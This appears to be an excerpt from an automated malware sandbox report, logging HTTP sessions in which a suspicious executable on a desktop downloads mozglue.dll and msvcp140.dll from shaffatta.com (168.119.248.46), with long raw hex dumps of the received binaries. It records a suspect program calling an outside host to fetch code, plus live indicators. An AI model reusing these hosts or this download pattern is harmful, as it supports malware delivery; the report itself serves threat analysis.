2024-05-03 00:08:35 UTC	16384	IN	Data Raw: 00 00 00 50 e8 75 1c 04 00 83 c4 04 8d 44 24 10 50 e8 68 1c 04 00 83 c4 04 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc Data Ascii: PuD$PhD$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEE
2024-05-03 00:08:35 UTC	16384	IN	Data Raw: ff 89 85 ac fe ff ff 89 d8 f7 e6 89 95 c0 fe ff ff 89 85 c8 fe ff ff 8b 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff Data Ascii: }eUeLXee0@eeeue0UEeeUee
2024-05-03 00:08:35 UTC	16384	IN	Data Raw: f6 eb 16 8b 45 b0 8b 78 0c 31 c0 eb 09 8b 45 b0 8b 78 0c 8b 47 3c 8b 77 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b Data Ascii: Ex1ExG<w8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EE
2024-05-03 00:08:35 UTC	16384	IN	Data Raw: ff ff ff 8b 95 28 ff ff ff 89 d6 81 e2 ff ff ff 03 8d 14 d0 89 c8 c1 e8 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff Data Ascii: (,0<48%8A)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49742	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:35 UTC	92	OUT	GET /d32e011d2eaa85a0/mozglue.dll HTTP/1.1 Host: shaffatta.com Cache-Control: no-cache
2024-05-03 00:08:36 UTC	286	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:08:36 GMT Content-Type: application/x-msdos-program Content-Length: 608080 Connection: close Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT ETag: "94750-5e7ea271b0900" Accept-Ranges: bytes X-Served-By: shaffatta.com
2024-05-03 00:08:36 UTC	16098	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
2024-05-03 00:08:36 UTC	16384	IN	Data Raw: 78 07 00 83 c4 0c 8b 45 ec e9 aa fe ff ff 8d 41 24 50 e8 17 7f 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 Data Ascii: xEA$P#H1A$P~#HbA$P~#HUVuF\|FlNhFd
2024-05-03 00:08:36 UTC	16384	IN	Data Raw: f9 ff ef ff ff 0f 86 c2 05 00 00 50 e8 9d d3 01 00 83 c4 04 e9 e6 f9 ff ff 8b 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 Data Ascii: PEPzEPWxP1`PHP$,FM1R'^_[]
2024-05-03 00:08:36 UTC	16384	IN	Data Raw: 8b 06 88 5c 38 04 89 fb b9 d3 4d 62 10 8b 7d f0 89 f8 f7 e1 89 d1 c1 e9 06 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 Data Ascii: \8Mb})0LY)0LZ\|!i(0C}L8!i(0u9Gu)0E8
2024-05-03 00:08:36 UTC	16384	IN	Data Raw: 83 1e 01 00 00 8b 45 ec 8d 04 85 00 00 00 00 8d 04 40 50 e8 16 bf 00 00 83 c4 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 Data Ascii: E@PEN1B]zB\|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR
2024-05-03 00:08:36 UTC	16384	IN	Data Raw: 83 c4 0c e9 c1 fe ff ff b8 05 00 00 00 e9 4c fd ff ff b8 04 00 00 00 e9 42 fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc Data Ascii: LBH) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H
2024-05-03 00:08:36 UTC	16384	IN	Data Raw: 56 e8 a8 d3 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 9b 04 00 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a Data Ascii: VL$4\|$D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F\|$4rD$ D$ WVjj
2024-05-03 00:08:36 UTC	16384	IN	Data Raw: 01 00 00 0f 87 78 01 00 00 a1 c8 e3 08 10 64 8b 0d 2c 00 00 00 8b 04 81 8b b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 Data Ascii: xd,D$4P<\|$\$t@)GD$ P08z.Jt_@u`\|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T$
2024-05-03 00:08:36 UTC	16384	IN	Data Raw: da 00 00 00 80 49 04 01 8b 42 04 89 c3 83 e3 fe 0f 84 c0 02 00 00 8b 0b 83 e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b Data Ascii: IBBD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCK
2024-05-03 00:08:36 UTC	16384	IN	Data Raw: 4b 85 d2 8b 7c 24 14 75 a5 e9 e0 00 00 00 31 db 43 85 d2 75 18 f6 c1 10 b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 Data Ascii: K\|$u1CuDL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$D

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49743	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:37 UTC	93	OUT	GET /d32e011d2eaa85a0/msvcp140.dll HTTP/1.1 Host: shaffatta.com Cache-Control: no-cache
2024-05-03 00:08:38 UTC	286	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:08:38 GMT Content-Type: application/x-msdos-program Content-Length: 450024 Connection: close Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT ETag: "6dde8-5e7ea271b0900" Accept-Ranges: bytes X-Served-By: shaffatta.com
2024-05-03 00:08:38 UTC	16098	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-05-03 00:08:38 UTC	16384	IN	Data Raw: 65 00 2d 00 69 00 6c 00 00 00 68 00 69 00 2d 00 69 00 6e 00 00 00 68 00 72 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d Data Ascii: e-ilhi-inhr-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkm
2024-05-03 00:08:38 UTC	16384	IN	Data Raw: 00 00 18 00 00 00 04 00 00 00 d8 4c 06 10 f4 8a 00 10 00 00 00 00 00 00 00 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 Data Ascii: Lx{\|L@DX}0}}M@4}0}}4M@tXM}0
2024-05-03 00:08:38 UTC	16384	IN	Data Raw: e8 6a f6 ff ff 0f bf 45 fc 50 ff 75 f0 e8 fb f7 ff ff 8b 45 f0 83 c4 18 d9 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 Data Ascii: jEPuEE]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]
2024-05-03 00:08:38 UTC	16384	IN	Data Raw: 54 75 7f 0f b7 0c 38 83 f9 79 74 05 83 f9 59 75 71 8d 77 02 03 f0 eb 6a 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 Data Ascii: Tu8ytYuqwjatAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-
2024-05-03 00:08:38 UTC	16384	IN	Data Raw: 0c c1 e8 02 24 01 c3 8b 49 04 85 c9 75 06 b8 56 52 00 10 c3 8b 41 18 85 c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 Data Ascii: $IuVRAuAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMh
2024-05-03 00:08:38 UTC	16384	IN	Data Raw: b2 ff ff 8b f0 8d 4e 01 51 e8 2f 95 ff ff 0f be 4d 10 53 89 77 14 8b f0 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 